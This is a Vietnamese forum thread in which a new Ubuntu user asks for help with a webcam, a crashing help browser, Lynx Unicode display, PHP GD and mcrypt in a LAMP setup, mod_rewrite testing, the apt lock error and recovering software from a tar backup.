- Yahoo! Messenger xem như thua trên Linux về khoản webcam rồi, giờ có lẽ rủ bạn mình dùng Skype (đã cài Skype ngon lành nhưng chưa chát web cam lần nào - có driver wc đâu nhỉ? )

- Nếu giải pháp Skype là kém cỏi thì mong muốn làm điều sau đây: tìm một phần mềm dạng stream server (dĩ nhiên là chạy trên Ubuntu rồi) cho phép boardcast tín hiệu webcam rồi NAT và tạo một trang web ngay trên con LAMP giả lập của mình đây để bạn bè vào đó xem mặt khi chát. Cấu hình web thì có lẽ là http://superthin.dyndns.org rồi (đã từng sử dụng, lâu quá bỏ chết queo, nhưng có lẽ tạo lại được thôi).

Nếu không có driver nào điều khiển con Diboom kia, các bạn có thể tìm giúp tài liệu kỹ thuật liên quan đến chíp điều khiển WC? Mình muốn... gồng mình thử tự viết một driver "made in bởi tui" để xem công việc đó thú vị cỡ nào, dù chỉ mới là newbie và hồi giờ chưa bao giờ động đến việc lập trình (chỉ biết duy nhất 1 câu để "khè" bạn gái là: <?php echo "Hello World"; ?> mà thôi smilie smilie )

Các bạn tiếp tục giúp sức nhé. Xin cám ơn!

------------
À, dùng Ubuntu bữa giờ quen thuộc lắm, ghé nhà thằng bạn thì ngớ ngẩn với máy Windows của nó: Ubuntu mình chạy GNOME, không KDE nên qua máy Windows cứ ngước mắt nhìn đồng hồ hệ thống ở top-right màn hình smilie . Chạy lệnh thì cứ Alt + F2 không thấy gì, hóa ra nó lại là Windows + R smilie ). Chết thật: tớ nghiện Linux rùi các bạn ạ.

quanta wrote:

Điểm mấu chốt khi muốn dò lý do vì sao một ứng dựng (có GUI) bị crash là chạy nó từ Terminal/Console. Trong trường hợp của bạn, những thông tin cuối cùng trên Terminal trước khi nó bị crash là gì? Vui lòng gửi lên đây.
 


Là gặp lỗi như sau:

Code:
superthin@superthin-desktop:~$ gnome-help
**
** Yelp:ERROR:(yelp-document.c:275):yelp_document_cancel_page: assertion failed: (document != NULL && YELP_IS_DOCUMENT (document))
Aborted
superthin@superthin-desktop:~$


Nhờ quanta đã giúp thì giúp cho trót luôn. Cám ơn bạn đã giới thiệu một cuốn sách thú vị.

Àh, hỏi ké thêm luôn, mình dùng LYNX để duyệt web, nhưng dường như nó không hỗ trợ tiếng Việt Unicode, nên vào các trang tiếng Việt thì kinh khủng lắm. Mình chắc rằng trên máy có hàng tá font Unicode, và cài đặt LYNX không có sai sót gì.

Vì mình là tín đồ dòng lệnh và rất sợ bị virus chui vào máy kể cả đang dùng Linux, nên duyệt web toàn dùng LYNX khi vào những trang đáng ngờ để hạn chế thấp nhất virus chui vào máy.

quanta wrote:

Bạn thử chạy nó từ Terminal bằng lệnh
Code:
$ gnome-help

 

Tình hình có khả quan hơn chút xíu. Cám ơn quanta nhé. Nhưng rồi vẫn chưa khắc phục được 100%, thi thoảng còn bị đóng lại. Có lẽ phải tìm một cuốn ebook miễn phí nào đó chuyên viết về những chức năng có trong Ubuntu xem thế nào.
Xin chào mọi người,

Hơn 10 ngày rùi mình mới trở lại, tình hình là khả quan, tự dùng Ubuntu và loay hoay với việc cứ mỗi 2 ngày "vác USB" ra dịch vụ Internet để dò tìm các gói .deb phần mềm download & mang về cài cho máy (hơi cực chút xíu nhưng ở nhà không có mạng ADSL biết làm thế nào).

Hôm nay muốn hỏi các bạn là chức năng Help của Ubuntu (click vào dấu hỏi ở trên thanh Lauch / Menu bar) ấy, đang xem thì tự nhiên nó đóng sầm lại, không hiểu nguyên do, đặc biệt là khi dùng chức năng search của nó, khả năng bị crash là 50% hoặc ngồi đợi khá lâu mới có kết quả. Khi bị đóng lại, không hiện bất kỳ thông báo lỗi nào. Các bạn chỉ giúp xem cách nào có thể coi thử có file log nào do Ubuntu để lại khi chức năng help bị đóng sầm lại kia? Mình muốn tìm nguyên nhân để khắc phục.



Đóng sầm lại khi thay đổi trang help bằng cách click vào các link hoặc gõ vào ô search

À, mình đã cố lên Google tìm, nhưng khi gõ help crash problem hoặc gì ấy thì không bao giờ ra được bài nào nói về chương trình Help bị crash mà toàn là những bài giúp đỡ vì cái gì đó bị crash => các bạn cũng hướng dẫn thêm cách diễn tả câu tìm kiếm kiểu này trong Google nhé.

Cám ơn các bạn đã chỉ dẫn giúp.
Chào các bạn,

Mình rất vui mừng thông báo là sau hơn chục ngày trên con đường chinh phục Linux (cụ thể là Ubuntu) và một vài ngày khác nằm bệnh viện (có lẽ bị Cánh Cụt mổ vào mắt smilie ) giờ thì trở về nhà, bật máy lên mới hay rằng gió gẫy đổ cây gần nhà làm đứt mấy cáp ADSL => không thể apt-get install cái gì được cả. Đợi bọn kỹ thuật tới chắc cũng vài ngày. Bây giờ đang dùng máy tính ở dịch vụ đây.

Đã lên mạng ở máy dịch vụ tìm được gói LAMP (Apache 2, MySQL 5, PHP 5) cho Ubuntu về và cài thành công. Nhưng rồi thì test một script có dùng tính năng CAPTCHA dùng đến thư viện GD mới hay rằng không có GD đi kèm gói LAMP kia smilie , khi xem phpinfo(); thì không thấy GD tồn tại. Giờ mình muốn tải về cài bổ sung, cũng theo cách là ra dịch vụ tải về và tự ngồi cài từ gói .deb hoặc compile cũng được. Các bạn chỉ giúp nhé.

Cũng gặp rắc rối là có một script buộc phải có mod rewrite cho Apache mới chạy, xem trong phpinfo(); thì thấy Apache có nạp mod rewrite rồi, nhưng làm theo readme của script kia hướng dẫn, copy file .htaccess vào đúng vị trí chỉ định thì lỗi 404 vẫn diễn ra. Bây giờ mình muốn test xem liệu mod rewrite kia có lỗi hay là do .htaccess bị cấu hình sai hoặc sai trong cấu hình ở file .conf nào đó của Apache, nhờ các bạn tìm giúp một script ví dụ đơn giản có kèm file .htaccess để mình có thể dùng test xem mod rewrite của mình lỗi hay là OK để còn biết mà lo liệu.

À, cũng gặp rắc rối là khi vào phpMyAdmin, nó báo thiếu mất thư viện mcrypt cho PHP, mình cũng muốn bổ sung thêm cái này để nó chạy cho đúng. Các bạn giúp luôn nhé.

Các bạn giúp thêm một số thông tin vì rối rắm sự đời quá không biết các phần mềm nó cài ở đâu, lúc thì thấy trong /etc, lúc lại /var, lúc lại /usr gì ấy. Nhờ các bạn hệ thống hóa giúp về cấu trúc thư mục, các phần mềm khi cài vào thì thường hay nằm chỗ nào... để mình có được cái nhìn đúng về Linux Ubuntu. Tự đọc tiếng Anh trên mạng cứ ôm khư khư cuốn từ điển đến là khổ.

Cám ơn mọi người đã nỗ lực cứu giúp.
Mình đang apt-get install một gói phần mềm khá big. Trong thời gian chờ đợi, muốn cài một gói khác nhỏ hơn nhưng cần thiết cho công việc để có thể sử dụng ngay. Vậy là chạy thêm một lệnh apt-get install gói khác thì nhận được thông báo lỗi:

[sudo] password for superthin:
E: Could not get lock /var/lib/dpkg/lock - open (11 Resource temporarily unavailable)
E: Unable to lock the administration directory (/var/lib/dpkg/), is another process using it? 


Xin hỏi, có cách này để chạy nhiều hơn 1 lần apt-get install? Với điều kiện là không được dừng / tạm dừng / ngắt / bãi bỏ các apt-get trước đó hoặc ảnh hưởng đến việc download các gói đang xảy ra, nghĩa là các apt-get đồng thời cùng chạy và chung sống hòa bình ấy.

Cám ơn các bạn đã trả lời giúp.
Đã chấp nhận đau thương và nghe theo đề nghị của Mr.Khoai, cài lại mới tất cả các phần mềm chạy cho good, dù sao cũng thêm một lần thực hành việc cài đặt, điều này là cần thiết.

Mọi việc xem như giải quyết xong. Đề nghị mod nào khóa giúp topic lại. Xin chân thành cám ơn các bạn, nhất là Mr.Khoai & Mr. Quanta (Plus?) smilie
Tình hình là máy hiện đang hoạt động rất tốt (sau khi cài lại lần thứ 2 vì lệnh tar nói sau)

Giờ thì nảy sinh một vấn đề: dùng lệnh tar để nghịch không thành công (đã xem bài hướng dẫn có link ở post trước, nhưng mình quên --exclude các file lưu cấu hình khởi động -> đã làm chết máy và phải cài lại Ubuntu).

Giờ này, mình đã dùng tar để giải nén tất cả ra môt thư mục /home/myname/oldubuntu/ . Các bạn chỉ xem, làm thế nào để mình bới trong đống này ra các phần mềm đã cài đặt và chép vào thư mục tương ứng để có thể chạy các phần mềm mà không phải apt-get install cài đặt lại hoặc phải tải về rồi lại compile với vài phần mềm khác.

Yêu cầu là chép thế nào để không làm chêt Ubuntu hiện tại (vì chép nhầm file hệ thống đè qua một cái là... tiêu điều).

--> /dev/sda6 chứ? Bạn thử:
 

Đúng là /dev/sda6 chữ không phải /dev/sda9, mình gõ nhầm. Cám ơn quanta.
 
Go to Page:  Page 2 Last Page

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|